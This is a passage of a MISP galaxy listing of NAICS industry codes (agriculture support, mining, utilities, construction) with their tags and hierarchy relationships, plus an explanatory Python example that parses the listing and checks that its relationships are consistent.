  • parent-of: misp-galaxy:naics="1152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="1153" with estimative-language:likelihood-probability="likely"

1151

Support Activities for Crop Production

The tag is: misp-galaxy:naics="1151"

1151 has relationships with:

  • child-of: misp-galaxy:naics="115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115116" with estimative-language:likelihood-probability="likely"

11511

Support Activities for Crop Production

The tag is: misp-galaxy:naics="11511"

11511 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115111

Cotton Ginning

The tag is: misp-galaxy:naics="115111"

115111 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115112

Soil Preparation, Planting, and Cultivating

The tag is: misp-galaxy:naics="115112"

115112 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115113

Crop Harvesting, Primarily by Machine

The tag is: misp-galaxy:naics="115113"

115113 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115114

Postharvest Crop Activities (except Cotton Ginning)

The tag is: misp-galaxy:naics="115114"

115114 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115115

Farm Labor Contractors and Crew Leaders

The tag is: misp-galaxy:naics="115115"

115115 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

115116

Farm Management Services

The tag is: misp-galaxy:naics="115116"

115116 has relationships with:

  • child-of: misp-galaxy:naics="1151" with estimative-language:likelihood-probability="likely"

1152

Support Activities for Animal Production

The tag is: misp-galaxy:naics="1152"

1152 has relationships with:

  • child-of: misp-galaxy:naics="115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11521" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115210" with estimative-language:likelihood-probability="likely"

11521

Support Activities for Animal Production

The tag is: misp-galaxy:naics="11521"

11521 has relationships with:

  • child-of: misp-galaxy:naics="1152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="115210" with estimative-language:likelihood-probability="likely"

115210

Support Activities for Animal Production

The tag is: misp-galaxy:naics="115210"

115210 has relationships with:

  • child-of: misp-galaxy:naics="1152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11521" with estimative-language:likelihood-probability="likely"

1153

Support Activities for Forestry

The tag is: misp-galaxy:naics="1153"

1153 has relationships with:

  • child-of: misp-galaxy:naics="115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="11531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="115310" with estimative-language:likelihood-probability="likely"

11531

Support Activities for Forestry

The tag is: misp-galaxy:naics="11531"

11531 has relationships with:

  • child-of: misp-galaxy:naics="1153" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="115310" with estimative-language:likelihood-probability="likely"

115310

Support Activities for Forestry

The tag is: misp-galaxy:naics="115310"

115310 has relationships with:

  • child-of: misp-galaxy:naics="1153" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="11531" with estimative-language:likelihood-probability="likely"

21

Mining, Quarrying, and Oil and Gas Extraction

The tag is: misp-galaxy:naics="21"

21 has relationships with:

  • parent-of: misp-galaxy:naics="211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213" with estimative-language:likelihood-probability="likely"

211

Oil and Gas Extraction

The tag is: misp-galaxy:naics="211"

211 has relationships with:

  • child-of: misp-galaxy:naics="21" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

2111

Oil and Gas Extraction

The tag is: misp-galaxy:naics="2111"

2111 has relationships with:

  • child-of: misp-galaxy:naics="211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="211120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="211130" with estimative-language:likelihood-probability="likely"

21112

Crude Petroleum Extraction

The tag is: misp-galaxy:naics="21112"

21112 has relationships with:

  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="211120" with estimative-language:likelihood-probability="likely"

211120

Crude Petroleum Extraction

The tag is: misp-galaxy:naics="211120"

211120 has relationships with:

  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21112" with estimative-language:likelihood-probability="likely"

21113

Natural Gas Extraction

The tag is: misp-galaxy:naics="21113"

21113 has relationships with:

  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="211130" with estimative-language:likelihood-probability="likely"

211130

Natural Gas Extraction

The tag is: misp-galaxy:naics="211130"

211130 has relationships with:

  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21113" with estimative-language:likelihood-probability="likely"
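
The relationship lines in this listing follow a fixed pattern: 5- and 6-digit codes are recorded as child-of their 4-digit industry group, a 6-digit code ending in 0 and its 5-digit prefix are recorded as similar to each other, and every link carries an estimative-language likelihood. The Python below is an added example and is not code from the MISP project or the galaxy itself. It parses a constructed sample copied from the entries for 2111, 21112 and 211120 above, expands a naics tag into the tags of its ancestors (the check an analyst needs to search for "everything under sector 21" regardless of tagging depth), and verifies that every recorded relationship has its inverse on the other side. The prefix rule in expected_parent is an assumption inferred from the entries on this page, not a documented MISP contract, and the names SAMPLE, BROKEN_SAMPLE, parse_listing, ancestor_tags and check_consistency are this example's own.

```python
import re

# Line shapes used by the rendered listing on this page (the bullet is U+2022).
TAG_RE = re.compile(r'misp-galaxy:naics="(\d{2,6})"')
TAG_LINE_RE = re.compile(r'^The tag is: misp-galaxy:naics="(\d{2,6})"$')
REL_LINE_RE = re.compile(
    r'^•\s*(child-of|parent-of|similar): misp-galaxy:naics="(\d{2,6})"'
    r' with estimative-language:likelihood-probability="([a-z-]+)"$'
)

# Constructed sample: three entries copied from this listing (blank lines dropped; the parser ignores them).
SAMPLE = """\
2111
Oil and Gas Extraction
The tag is: misp-galaxy:naics="2111"
2111 has relationships with:
  • child-of: misp-galaxy:naics="211" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="21112" with estimative-language:likelihood-probability="likely"
  • parent-of: misp-galaxy:naics="211120" with estimative-language:likelihood-probability="likely"
21112
Crude Petroleum Extraction
The tag is: misp-galaxy:naics="21112"
21112 has relationships with:
  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="211120" with estimative-language:likelihood-probability="likely"
211120
Crude Petroleum Extraction
The tag is: misp-galaxy:naics="211120"
211120 has relationships with:
  • child-of: misp-galaxy:naics="2111" with estimative-language:likelihood-probability="likely"
  • similar: misp-galaxy:naics="21112" with estimative-language:likelihood-probability="likely"
"""

# The same constructed sample with one 'similar' link pointed at the wrong code, so the checker has something to catch.
BROKEN_SAMPLE = SAMPLE.replace('similar: misp-galaxy:naics="21112"', 'similar: misp-galaxy:naics="21113"')


def parse_listing(text):
    """Parse the rendered listing into {code: {"name": str, "rels": {(type, target, likelihood), ...}}}."""
    clusters, prev, current = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = TAG_LINE_RE.match(line)
        if m:
            current = m.group(1)
            clusters[current] = {"name": prev, "rels": set()}  # the name line precedes the tag line
        else:
            m = REL_LINE_RE.match(line)
            if m and current is not None:
                clusters[current]["rels"].add((m.group(1), m.group(2), m.group(3)))
        prev = line
    return clusters


def expected_parent(code):
    """Parent under the hierarchy this page records (an assumption inferred from the listing):
    5- and 6-digit codes hang directly off the 4-digit industry group, 4-digit codes off the
    3-digit subsector, 3-digit codes off the 2-digit sector, and 2-digit sectors are roots."""
    n = len(code)
    if n in (5, 6):
        return code[:4]
    if n in (3, 4):
        return code[:-1]
    return None


def ancestor_tags(tag):
    """Expand one misp-galaxy:naics tag into its ancestor tags, nearest first."""
    m = TAG_RE.fullmatch(tag.strip())
    if not m:
        raise ValueError("not a misp-galaxy:naics tag: %r" % tag)
    out, code = [], expected_parent(m.group(1))
    while code is not None:
        out.append('misp-galaxy:naics="%s"' % code)
        code = expected_parent(code)
    return out


INVERSE = {"child-of": "parent-of", "parent-of": "child-of", "similar": "similar"}


def check_consistency(clusters):
    """Report child-of links that disagree with the prefix rule, and relationships whose target
    is in the parsed set but does not record the inverse link with the same likelihood."""
    problems = []
    for code, entry in clusters.items():
        for rtype, target, likelihood in entry["rels"]:
            if rtype == "child-of" and target != expected_parent(code):
                problems.append("%s child-of %s but prefix rule expects %s" % (code, target, expected_parent(code)))
            if target in clusters and (INVERSE[rtype], code, likelihood) not in clusters[target]["rels"]:
                problems.append("%s %s %s has no inverse %s link" % (code, rtype, target, INVERSE[rtype]))
    return sorted(problems)


if __name__ == "__main__":
    print(ancestor_tags('misp-galaxy:naics="211120"'))
    print("clean sample:", check_consistency(parse_listing(SAMPLE)))
    print("broken sample:", check_consistency(parse_listing(BROKEN_SAMPLE)))
```

Targets that are absent from the parsed set (211 in the sample, whose entry was not copied) are skipped by the reciprocity check rather than reported, so the checker can be run on a partial extract; run it over the full listing to get a complete report.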

212

Mining (except Oil and Gas)

The tag is: misp-galaxy:naics="212"

212 has relationships with:

  • child-of: misp-galaxy:naics="21" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

2121

Coal Mining

The tag is: misp-galaxy:naics="2121"

2121 has relationships with:

  • child-of: misp-galaxy:naics="212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212115" with estimative-language:likelihood-probability="likely"

21211

Coal Mining

The tag is: misp-galaxy:naics="21211"

21211 has relationships with:

  • child-of: misp-galaxy:naics="2121" with estimative-language:likelihood-probability="likely"

212114

Surface Coal Mining

The tag is: misp-galaxy:naics="212114"

212114 has relationships with:

  • child-of: misp-galaxy:naics="2121" with estimative-language:likelihood-probability="likely"

212115

Underground Coal Mining

The tag is: misp-galaxy:naics="212115"

212115 has relationships with:

  • child-of: misp-galaxy:naics="2121" with estimative-language:likelihood-probability="likely"

2122

Metal Ore Mining

The tag is: misp-galaxy:naics="2122"

2122 has relationships with:

  • child-of: misp-galaxy:naics="212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212290" with estimative-language:likelihood-probability="likely"

21221

Iron Ore Mining

The tag is: misp-galaxy:naics="21221"

21221 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212210" with estimative-language:likelihood-probability="likely"

212210

Iron Ore Mining

The tag is: misp-galaxy:naics="212210"

212210 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21221" with estimative-language:likelihood-probability="likely"

21222

Gold Ore and Silver Ore Mining

The tag is: misp-galaxy:naics="21222"

21222 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212220" with estimative-language:likelihood-probability="likely"

212220

Gold Ore and Silver Ore Mining

The tag is: misp-galaxy:naics="212220"

212220 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21222" with estimative-language:likelihood-probability="likely"

21223

Copper, Nickel, Lead, and Zinc Mining

The tag is: misp-galaxy:naics="21223"

21223 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212230" with estimative-language:likelihood-probability="likely"

212230

Copper, Nickel, Lead, and Zinc Mining

The tag is: misp-galaxy:naics="212230"

212230 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21223" with estimative-language:likelihood-probability="likely"

21229

Other Metal Ore Mining

The tag is: misp-galaxy:naics="21229"

21229 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212290" with estimative-language:likelihood-probability="likely"

212290

Other Metal Ore Mining

The tag is: misp-galaxy:naics="212290"

212290 has relationships with:

  • child-of: misp-galaxy:naics="2122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21229" with estimative-language:likelihood-probability="likely"

2123

Nonmetallic Mineral Mining and Quarrying

The tag is: misp-galaxy:naics="2123"

2123 has relationships with:

  • child-of: misp-galaxy:naics="212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212319" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21239" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="212390" with estimative-language:likelihood-probability="likely"

21231

Stone Mining and Quarrying

The tag is: misp-galaxy:naics="21231"

21231 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212311

Dimension Stone Mining and Quarrying

The tag is: misp-galaxy:naics="212311"

212311 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212312

Crushed and Broken Limestone Mining and Quarrying

The tag is: misp-galaxy:naics="212312"

212312 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212313

Crushed and Broken Granite Mining and Quarrying

The tag is: misp-galaxy:naics="212313"

212313 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212319

Other Crushed and Broken Stone Mining and Quarrying

The tag is: misp-galaxy:naics="212319"

212319 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

21232

Sand, Gravel, Clay, and Ceramic and Refractory Minerals Mining and Quarrying

The tag is: misp-galaxy:naics="21232"

21232 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212321

Construction Sand and Gravel Mining

The tag is: misp-galaxy:naics="212321"

212321 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212322

Industrial Sand Mining

The tag is: misp-galaxy:naics="212322"

212322 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

212323

Kaolin, Clay, and Ceramic and Refractory Minerals Mining

The tag is: misp-galaxy:naics="212323"

212323 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

21239

Other Nonmetallic Mineral Mining and Quarrying

The tag is: misp-galaxy:naics="21239"

21239 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="212390" with estimative-language:likelihood-probability="likely"

212390

Other Nonmetallic Mineral Mining and Quarrying

The tag is: misp-galaxy:naics="212390"

212390 has relationships with:

  • child-of: misp-galaxy:naics="2123" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="21239" with estimative-language:likelihood-probability="likely"

213

Support Activities for Mining

The tag is: misp-galaxy:naics="213"

213 has relationships with:

  • child-of: misp-galaxy:naics="21" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

2131

Support Activities for Mining

The tag is: misp-galaxy:naics="2131"

2131 has relationships with:

  • child-of: misp-galaxy:naics="213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="21311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="213115" with estimative-language:likelihood-probability="likely"

21311

Support Activities for Mining

The tag is: misp-galaxy:naics="21311"

21311 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213111

Drilling Oil and Gas Wells

The tag is: misp-galaxy:naics="213111"

213111 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213112

Support Activities for Oil and Gas Operations

The tag is: misp-galaxy:naics="213112"

213112 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213113

Support Activities for Coal Mining

The tag is: misp-galaxy:naics="213113"

213113 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213114

Support Activities for Metal Mining

The tag is: misp-galaxy:naics="213114"

213114 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

213115

Support Activities for Nonmetallic Minerals (except Fuels) Mining

The tag is: misp-galaxy:naics="213115"

213115 has relationships with:

  • child-of: misp-galaxy:naics="2131" with estimative-language:likelihood-probability="likely"

22

Utilities

The tag is: misp-galaxy:naics="22"

22 has relationships with:

  • parent-of: misp-galaxy:naics="221" with estimative-language:likelihood-probability="likely"

221

Utilities

The tag is: misp-galaxy:naics="221"

221 has relationships with:

  • child-of: misp-galaxy:naics="22" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

2211

Electric Power Generation, Transmission and Distribution

The tag is: misp-galaxy:naics="2211"

2211 has relationships with:

  • child-of: misp-galaxy:naics="221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221118" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221122" with estimative-language:likelihood-probability="likely"

22111

Electric Power Generation

The tag is: misp-galaxy:naics="22111"

22111 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221111

Hydroelectric Power Generation

The tag is: misp-galaxy:naics="221111"

221111 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221112

Fossil Fuel Electric Power Generation

The tag is: misp-galaxy:naics="221112"

221112 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221113

Nuclear Electric Power Generation

The tag is: misp-galaxy:naics="221113"

221113 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221114

Solar Electric Power Generation

The tag is: misp-galaxy:naics="221114"

221114 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221115

Wind Electric Power Generation

The tag is: misp-galaxy:naics="221115"

221115 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221116

Geothermal Electric Power Generation

The tag is: misp-galaxy:naics="221116"

221116 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221117

Biomass Electric Power Generation

The tag is: misp-galaxy:naics="221117"

221117 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221118

Other Electric Power Generation

The tag is: misp-galaxy:naics="221118"

221118 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

22112

Electric Power Transmission, Control, and Distribution

The tag is: misp-galaxy:naics="22112"

22112 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221121

Electric Bulk Power Transmission and Control

The tag is: misp-galaxy:naics="221121"

221121 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

221122

Electric Power Distribution

The tag is: misp-galaxy:naics="221122"

221122 has relationships with:

  • child-of: misp-galaxy:naics="2211" with estimative-language:likelihood-probability="likely"

2212

Natural Gas Distribution

The tag is: misp-galaxy:naics="2212"

2212 has relationships with:

  • child-of: misp-galaxy:naics="221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221210" with estimative-language:likelihood-probability="likely"

22121

Natural Gas Distribution

The tag is: misp-galaxy:naics="22121"

22121 has relationships with:

  • child-of: misp-galaxy:naics="2212" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="221210" with estimative-language:likelihood-probability="likely"

221210

Natural Gas Distribution

The tag is: misp-galaxy:naics="221210"

221210 has relationships with:

  • child-of: misp-galaxy:naics="2212" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="22121" with estimative-language:likelihood-probability="likely"

2213

Water, Sewage and Other Systems

The tag is: misp-galaxy:naics="2213"

2213 has relationships with:

  • child-of: misp-galaxy:naics="221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="22133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="221330" with estimative-language:likelihood-probability="likely"

22131

Water Supply and Irrigation Systems

The tag is: misp-galaxy:naics="22131"

22131 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="221310" with estimative-language:likelihood-probability="likely"

221310

Water Supply and Irrigation Systems

The tag is: misp-galaxy:naics="221310"

221310 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="22131" with estimative-language:likelihood-probability="likely"

22132

Sewage Treatment Facilities

The tag is: misp-galaxy:naics="22132"

22132 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="221320" with estimative-language:likelihood-probability="likely"

221320

Sewage Treatment Facilities

The tag is: misp-galaxy:naics="221320"

221320 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="22132" with estimative-language:likelihood-probability="likely"

22133

Steam and Air-Conditioning Supply

The tag is: misp-galaxy:naics="22133"

22133 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="221330" with estimative-language:likelihood-probability="likely"

221330

Steam and Air-Conditioning Supply

The tag is: misp-galaxy:naics="221330"

221330 has relationships with:

  • child-of: misp-galaxy:naics="2213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="22133" with estimative-language:likelihood-probability="likely"

23

Construction

The tag is: misp-galaxy:naics="23"

23 has relationships with:

  • parent-of: misp-galaxy:naics="236" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

236

Construction of Buildings

The tag is: misp-galaxy:naics="236"

236 has relationships with:

  • child-of: misp-galaxy:naics="23" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

2361

Residential Building Construction

The tag is: misp-galaxy:naics="2361"

2361 has relationships with:

  • child-of: misp-galaxy:naics="236" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236118" with estimative-language:likelihood-probability="likely"

23611

Residential Building Construction

The tag is: misp-galaxy:naics="23611"

23611 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

236115

New Single-Family Housing Construction (except For-Sale Builders)

The tag is: misp-galaxy:naics="236115"

236115 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

236116

New Multifamily Housing Construction (except For-Sale Builders)

The tag is: misp-galaxy:naics="236116"

236116 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

236117

New Housing For-Sale Builders

The tag is: misp-galaxy:naics="236117"

236117 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

236118

Residential Remodelers

The tag is: misp-galaxy:naics="236118"

236118 has relationships with:

  • child-of: misp-galaxy:naics="2361" with estimative-language:likelihood-probability="likely"

2362

Nonresidential Building Construction

The tag is: misp-galaxy:naics="2362"

2362 has relationships with:

  • child-of: misp-galaxy:naics="236" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="236220" with estimative-language:likelihood-probability="likely"

23621

Industrial Building Construction

The tag is: misp-galaxy:naics="23621"

23621 has relationships with:

  • child-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="236210" with estimative-language:likelihood-probability="likely"

236210

Industrial Building Construction

The tag is: misp-galaxy:naics="236210"

236210 has relationships with:

  • child-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23621" with estimative-language:likelihood-probability="likely"

23622

Commercial and Institutional Building Construction

The tag is: misp-galaxy:naics="23622"

23622 has relationships with:

  • child-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="236220" with estimative-language:likelihood-probability="likely"

236220

Commercial and Institutional Building Construction

The tag is: misp-galaxy:naics="236220"

236220 has relationships with:

  • child-of: misp-galaxy:naics="2362" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23622" with estimative-language:likelihood-probability="likely"

237

Heavy and Civil Engineering Construction

The tag is: misp-galaxy:naics="237"

237 has relationships with:

  • child-of: misp-galaxy:naics="23" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2371" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2372" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="2373" with estimative-language:likelihood-probability="likely"
